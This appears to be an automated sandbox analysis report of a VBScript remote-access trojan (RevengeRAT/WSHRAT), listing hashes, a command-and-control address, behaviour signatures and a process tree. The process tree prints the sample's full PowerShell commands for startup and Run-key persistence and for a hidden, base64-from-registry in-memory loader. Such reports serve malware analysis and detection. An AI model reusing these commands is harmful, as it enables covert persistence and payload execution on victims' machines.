Analysis
-
max time kernel
144s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
15-09-2024 20:42
Static task
static1
Behavioral task
behavioral1
Sample
e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs
Resource
win10v2004-20240802-en
General
-
Target
e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs
-
Size
155KB
-
MD5
e3516f50c3eec802132c17e8250a82c5
-
SHA1
3a1ec1501f21809f34cdbb6dccb662de26e96791
-
SHA256
3d039a276556af992957c235fbdb216e79d1cf95787cab0e98f86158d4e34630
-
SHA512
3c972ec1612ab8ce7fb2b2e76bedd0d3a1e52afab8438b88aef29628b5c94260dc52219dcadc0076c4c9f0103fa4c9d0454dddb58d7f80e400f917d272e2999d
-
SSDEEP
3072:pjnXcHK4l+/Ms3p/kCP7BQdYj1DFi63iMS7iW6pKA8pCFt/W5EujzIkK8XsO7IeF:tp4liMs3p/kCP7BQd01DFi63iMS7iW6S
Malware Config
Extracted
revengerat
Extracted
wshrat
http://pluginsrv2.duckdns.org:8899
Signatures
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
RevengeRat Executable 1 IoCs
resource yara_rule behavioral2/memory/1704-45-0x0000019F1F9B0000-0x0000019F1F9B8000-memory.dmp revengerat -
Blocklisted process makes network request 32 IoCs
flow pid Process 8 1472 wscript.exe 9 1704 powershell.exe 19 1472 wscript.exe 26 1472 wscript.exe 27 1472 wscript.exe 28 1704 powershell.exe 29 1472 wscript.exe 36 1472 wscript.exe 44 1472 wscript.exe 45 1472 wscript.exe 46 1704 powershell.exe 47 1472 wscript.exe 48 1472 wscript.exe 49 1472 wscript.exe 52 1472 wscript.exe 53 1704 powershell.exe 54 1472 wscript.exe 55 1472 wscript.exe 56 1472 wscript.exe 59 1472 wscript.exe 64 1704 powershell.exe 65 1472 wscript.exe 66 1472 wscript.exe 67 1472 wscript.exe 68 1472 wscript.exe 69 1704 powershell.exe 70 1472 wscript.exe 71 1472 wscript.exe 72 1472 wscript.exe 73 1472 wscript.exe 74 1704 powershell.exe 75 1472 wscript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 1704 powershell.exe 3756 powershell.exe 4800 powershell.exe 1192 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation wscript.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TYkxdUNRwA.vbs wscript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TYkxdUNRwA.vbs wscript.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs powershell.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TYkxdUNRwA = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\TYkxdUNRwA.vbs\"" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TYkxdUNRwA = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\TYkxdUNRwA.vbs\"" wscript.exe Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 3756 powershell.exe 3756 powershell.exe 4800 powershell.exe 1704 powershell.exe 1192 powershell.exe 1704 powershell.exe 4800 powershell.exe 1192 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3756 powershell.exe Token: SeDebugPrivilege 4800 powershell.exe Token: SeDebugPrivilege 1704 powershell.exe Token: SeDebugPrivilege 1192 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2816 wrote to memory of 1472 2816 WScript.exe 82 PID 2816 wrote to memory of 1472 2816 WScript.exe 82 PID 2816 wrote to memory of 3756 2816 WScript.exe 83 PID 2816 wrote to memory of 3756 2816 WScript.exe 83 PID 3756 wrote to memory of 3944 3756 powershell.exe 86 PID 3756 wrote to memory of 3944 3756 powershell.exe 86 PID 3944 wrote to memory of 4916 3944 wscript.exe 87 PID 3944 wrote to memory of 4916 3944 wscript.exe 87 PID 3944 wrote to memory of 4800 3944 wscript.exe 88 PID 3944 wrote to memory of 4800 3944 wscript.exe 88 PID 3944 wrote to memory of 1192 3944 wscript.exe 90 PID 3944 wrote to memory of 1192 3944 wscript.exe 90 PID 3944 wrote to memory of 1704 3944 wscript.exe 92 PID 3944 wrote to memory of 1704 3944 wscript.exe 92
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\TYkxdUNRwA.vbs"2⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
PID:1472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs'));wscript 'C:\Users\Admin\AppData\Roaming\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Roaming\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\TYkxdUNRwA.vbs"4⤵PID:4916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\Admin\AppData\Roaming\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs' -PropertyType String -Force;"4⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs'))"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
38KB
MD5c0b5796adf455943dd775724c9764e54
SHA12b00d998feb0aa61a2606aecf0a6a947195438d7
SHA256e388aca790fbb89713c272dcbbf3a892088cd622004ef77a05018dbb28557859
SHA512968ae0524f7a3dc53b9331c1065f6f473333424c4a07e56797c05c2692deae4733e3e8b4af1db75c4fb27dd5b7015552d17385c6ab2dec9b7a14224524d4d568
-
Filesize
155KB
MD5e3516f50c3eec802132c17e8250a82c5
SHA13a1ec1501f21809f34cdbb6dccb662de26e96791
SHA2563d039a276556af992957c235fbdb216e79d1cf95787cab0e98f86158d4e34630
SHA5123c972ec1612ab8ce7fb2b2e76bedd0d3a1e52afab8438b88aef29628b5c94260dc52219dcadc0076c4c9f0103fa4c9d0454dddb58d7f80e400f917d272e2999d